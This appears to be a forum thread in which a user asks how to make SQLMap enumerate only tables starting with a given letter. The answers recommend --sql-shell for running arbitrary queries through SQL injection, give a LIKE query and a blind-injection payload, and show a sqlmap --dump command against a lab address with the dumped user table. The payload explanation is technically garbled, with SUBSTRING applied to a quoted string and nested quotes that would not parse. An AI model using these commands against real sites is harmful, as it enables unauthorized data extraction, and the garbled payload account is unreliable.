I would like to know the command of SQLMap, which permits me to retreive just tables that begin with a special letter. Example with letter "T":
sqlmap.py -u www.website -D database -T tables (...)
I would like to know the command of SQLMap, which permits me to retreive just tables that begin with a special letter. Example with letter "T":
sqlmap.py -u www.website -D database -T tables (...)
I believe you have 2 options in this case:
You can use sqlmap
inside of a shell script to list the tables,
and save those results to iterate over with successive calls to
sqlmap
.
You can use sqlmap
to run a designated SQL query with the
--sql-query option
.
I don't think the tool is capable of running as you desire, like this:
sqlmap.py -u www.website -D database -T "t*"
SQLMap does not support this natively. But you can build your own query that retrieves exactly what you need. You need to see --sql-shell parameter
. It will pop-up shell commands. Every single query you type on that shell will be executed through sql injection attack!
You can use the following query. It retrieves table names that starts with "w":
SELECT table_name FROM information_schema.tables WHERE table_schema=database() and table_name LIKE 'w%';
Actually the above query is almost the same as native SQLMap payloads. For example SQLMap uses the following payload for Blind SQL Injections.
' AND SUBSTRING('SELECT version()', 1,1)
In this payload SQLMap try to retrieve results of SELECT version();
query which is predefined inside SQLMap XML file. We are updating this query with --sql-shell command
. Every single "normal" database query you pass to the terminal is going to be replaced with SELECT version();
.
' AND SUBSTRING('SELECT table_name FROM information_schema.tables WHERE table_schema=database() and table_name LIKE 'w%';', 1,1)
The rest of the SQL Injection mechanism will be okay as long as your custom query is correct.
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\
--dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME | SURNAME |
+----+--------+------------+
| 1 | luther | blisset |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
+----+--------+------------+